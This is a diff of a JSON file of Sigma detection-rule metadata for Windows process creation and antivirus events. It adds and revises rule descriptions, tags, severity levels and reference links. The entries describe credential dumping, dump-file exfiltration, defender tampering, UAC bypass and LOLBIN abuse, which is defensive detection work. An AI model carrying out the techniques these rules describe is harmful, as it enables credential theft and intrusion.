"windows", "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", - "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml" ], "tags": [ @@ -75295,9 +76524,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://www.gpg4win.de/documentation.html", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml" ], "tags": [ @@ -75320,8 +76549,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml" @@ -75390,8 +76619,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml" ], "tags": [ @@ -75447,9 +76676,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://emkc.org/s/RJjuLa", "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://redcanary.com/blog/chromeloader/", + "https://emkc.org/s/RJjuLa", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml" ], "tags": [ @@ -75516,9 +76745,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", - "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://github.com/jpillora/chisel/", + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", + "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_chisel.yml" ], "tags": [ @@ -75585,11 +76814,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://twitter.com/bohops/status/980659399495741441", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://twitter.com/JohnLaTwC/status/1223292479270600706", - "https://twitter.com/bohops/status/980659399495741441", "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml" ], "tags": [ @@ -75669,10 +76898,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_susp_execution.yml" ], @@ -75780,9 +77009,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml" ], "tags": [ @@ -75815,9 +77044,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://twitter.com/pabraeken/status/993298228840992768", "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], "tags": [ @@ -75837,15 +77066,16 @@ "value": "Malicious Windows Script Components File Execution by TAEF Detection" }, { - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects execution of 7z in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022/09/27", "falsepositive": [ - "Unknown" + "Legitimate use of 7z with a command line in which \".dmp\" or \".dump\" appears accidentally", + "Legitimate use of 7z to compress WER \".dmp\" files for troubleshooting" ], "filename": "proc_creation_win_7zip_exfil_dmp_files.yml", - "level": "high", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ @@ -75915,8 +77145,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", + "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" ], "tags": [ @@ -75960,6 +77190,31 @@ "uuid": "9525dc73-0327-438c-8c04-13c0e037e9da", "value": "Regsvr32 Execution From Potential Suspicious Location" }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.", + "meta": { + "author": "Florian Roth (Nextron Systems)", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wermgr_susp_exec_location.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/binderlabs/DirCreate2System", + "https://www.echotrail.io/insights/search/wermgr.exe", + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5", + "value": "Suspicious Execution Location Of Wermgr.EXE" + }, { "description": "Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name", "meta": { @@ -76047,9 +77302,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms", "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit", - "https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csvde_export.yml" ], "tags": [ @@ -76072,8 +77327,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml" ], @@ -76107,10 +77362,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://twitter.com/bohops/status/1276357235954909188?s=12", - "https://twitter.com/nas_bench/status/1535322450858233858", "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://twitter.com/nas_bench/status/1535322450858233858", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml" ], "tags": [ @@ -76350,8 +77605,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Oddvarmoe/status/985518877076541440", "https://lolbas-project.github.io/lolbas/Binaries/Print/", + "https://twitter.com/Oddvarmoe/status/985518877076541440", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml" ], "tags": [ @@ -76418,8 +77673,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/windowsterminalprofile.html", "https://twitter.com/nas_bench/status/1550836225652686848", + "https://persistence-info.github.io/Data/windowsterminalprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" ], "tags": [ @@ -76586,12 +77841,12 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://pentestlab.blog/tag/ntds-dit/", "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://github.com/zcgonvh/NTDSDumpEx", + "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ @@ -76750,6 +78005,33 @@ "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "value": "PowerShell Download Pattern" }, + { + "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\n", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JAMESWT_MHT/status/1699042827261391247", + "https://twitter.com/M_haggis/status/1699056847154725107", + "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "10344bb3-7f65-46c2-b915-2d00d47be5b0", + "value": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI" + }, { "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", "meta": { @@ -76801,7 +78083,8 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml" ], "tags": [ - "attack.credential_access", + "attack.privilege_escalation", + "attack.persistence", "attack.t1546.008" ] }, @@ -76962,8 +78245,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", "https://lolbas-project.github.io/lolbas/Binaries/Replace/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ @@ -77029,8 +78312,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", "https://github.com/med0x2e/vba2clr", + "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_parent.yml" ], "tags": [ @@ -77055,8 +78338,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", "https://twitter.com/pabraeken/status/991335019833708544", + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" ], "tags": [ @@ -77125,11 +78408,58 @@ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml" ], - "tags": "No established tags" + "tags": [ + "attack.persistence", + "attack.t1505.004" + ] }, + "related": [ + { + "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", "value": "Suspicious IIS Module Registration" }, + { + "description": "Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.\n", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/08/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_copy_system_dir_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", + "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "f5d19838-41b5-476c-98d8-ba8af4929ee2", + "value": "LOL-Binary Copied From System Directory" + }, { "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", "meta": { @@ -77144,8 +78474,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml" ], "tags": [ @@ -77181,8 +78511,29 @@ "https://redcanary.com/blog/blackbyte-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1564", + "attack.t1059" + ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "value": "Parent in Public Folder Suspicious Process" }, @@ -77234,8 +78585,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/harr0ey/status/991670870384021504", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml" ], "tags": [ @@ -77310,9 +78661,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0", - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" ], "tags": [ @@ -77422,8 +78773,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", + "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml" ], "tags": [ @@ -77755,8 +79106,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], @@ -77857,8 +79208,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", + "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml" ], "tags": [ @@ -77904,8 +79255,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", + "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" ], "tags": [ @@ -78017,8 +79368,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/msbuild.exe", "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", + "https://www.echotrail.io/insights/search/msbuild.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml" ], "tags": [ @@ -78075,8 +79426,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://ss64.com/bash/rar.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml" ], @@ -78133,8 +79484,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/", "https://twitter.com/Hexacorn/status/1224848930795552769", + "http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml" ], "tags": [ @@ -78157,8 +79508,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/netero1010/TrustedPath-UACBypass-BOF", "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", + "https://github.com/netero1010/TrustedPath-UACBypass-BOF", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml" ], @@ -78192,8 +79543,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" ], "tags": [ @@ -78470,8 +79821,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/harr0ey/status/992008180904419328", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", + "https://twitter.com/harr0ey/status/992008180904419328", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" ], "tags": [ @@ -78571,8 +79922,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md", + "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml" ], "tags": [ @@ -78672,8 +80023,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" ], "tags": [ @@ -78797,9 +80148,9 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", - "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", + "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml" ], "tags": [ @@ -78832,8 +80183,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/rikvduijn/status/853251879320662017", "https://twitter.com/felixw3000/status/853354851128025088", + "https://twitter.com/rikvduijn/status/853251879320662017", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml" ], "tags": [ @@ -78866,8 +80217,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", + "https://twitter.com/0gtweet/status/1674399582162153472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml" ], "tags": [ @@ -78900,9 +80251,9 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ + "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448", "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619", - "https://www.nextron-systems.com/?s=antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml" ], "tags": [ @@ -78960,8 +80311,8 @@ "logsource.product": "No established product", "refs": [ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://twitter.com/mvelazco/status/1410291741241102338", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://twitter.com/mvelazco/status/1410291741241102338", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml" ], "tags": [ @@ -79027,10 +80378,10 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797", - "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466", - "https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424", "https://www.nextron-systems.com/?s=antivirus", + "https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424", + "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466", + "https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml" ], "tags": [ @@ -79072,8 +80423,8 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", "https://www.nextron-systems.com/?s=antivirus", + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml" ], "tags": [ @@ -79106,16 +80457,16 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", 